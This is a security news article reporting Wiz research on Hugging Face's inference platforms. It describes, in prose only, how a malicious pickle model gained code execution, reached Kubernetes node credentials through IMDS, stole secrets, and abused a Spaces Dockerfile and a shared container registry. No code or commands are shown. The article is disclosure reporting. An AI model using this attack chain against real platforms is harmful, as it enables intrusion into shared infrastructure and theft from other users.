AI-as-a-Service Platform Flaw Allows Hackers to Escalate Privileges

Hugging Face is an open-source platform for AI development that allows users to train, store, and share machine learning models and datasets. It serves as a central hub for the AI community to collaborate and experiment with pre-trained models and datasets. 

Due to its popularity and role in the AI ecosystem, Hugging Face is a potential target for attackers who could gain access to sensitive AI models and datasets, posing a risk to the broader AI supply chain.  

Researchers found significant flaws in AI-as-a-service providers that hackers could use to deploy malicious models. They could do this by taking advantage of flaws in the inference process (using untrusted pickle formats) to get in without permission and possibly compromise other users’ models stored by those hackers.

AI-as-a-Service attack flow

Attackers could also mess with the CI/CD pipeline by adding malicious code to AI applications. This would create a supply chain attack within the AI-as-a-service platform and show how dangerous it is to share resources and how important it is for AI service providers to have strong security measures.

AI/ML applications are made up of three parts: models, application code, and inference infrastructure. Each part is vulnerable to security threats, such as adversarial inputs that can change models, unsafe applications that can make incorrect predictions, and malicious models that can be put into the inference infrastructure.

The lack of tools to verify model integrity makes trusting downloaded models risky. This paper demonstrates how to exploit Hugging Face’s infrastructure with a malicious model and suggests methods to mitigate the risk. 

Researchers at Wiz examined isolation vulnerabilities in AI-as-a-service (AIaaS) platforms, concerned about malicious actors exploiting shared compute resources. 

Inference API feature available for the model gpt2 on Hugging Face

They focused on three key Hugging Face offerings: Inference API (allowing model experimentation without local installs), Inference Endpoints (managed service for production deployments), and Spaces (for hosting and collaborating on AI applications). 

The investigation aimed to determine if AI models running on these platforms were sufficiently isolated to prevent unauthorized access or interference between users by examining Hugging Face Inference offerings and finding that users can upload custom models. 

Comparison between different AI model formats, as stated on Safetensors’ GitHub page

It raised a security question: could a malicious model be uploaded to execute arbitrary code within the Inference API? The PyTorch Pickle format, known to be unsafe for remote code execution (RCE), was chosen for the experiment. 

example of the malware scanning result of an uploaded model on Hugging Face

Hugging Face scans uploaded Pickle files but allows inference on flagged models due to community usage by uploading a malicious Pickle model to test if the Inference API would execute the code and in what environment (sandboxed or shared with other users). 

An attacker exploited a RCE vulnerability in the Hugging Face Inference API to gain a foothold in a Kubernetes pod running on Amazon EKS.

The attacker retrieved a valid Kubernetes token with node privileges by abusing the pod’s capability to query IMDS and the insecure default configuration that allows pods to get node identity and role. 

Reverse shell from Hugging Face upon inference of a specially crafted AI model

This allowed them to list pod information and steal secrets, potentially enabling lateral movement within the EKS cluster by exploiting a vulnerability in Hugging Face Spaces and crafting a Dockerfile that executed malicious code during the image build process. 

The malicious Dockerfile used in the research

It also gave them access to a user-shared internal container registry and by using insufficient access controls, they could have overwritten other users’ container images, potentially compromising their deployed applications. 

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Co-Founder & Editor-in-Chief - Cyber Press Inc.,

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here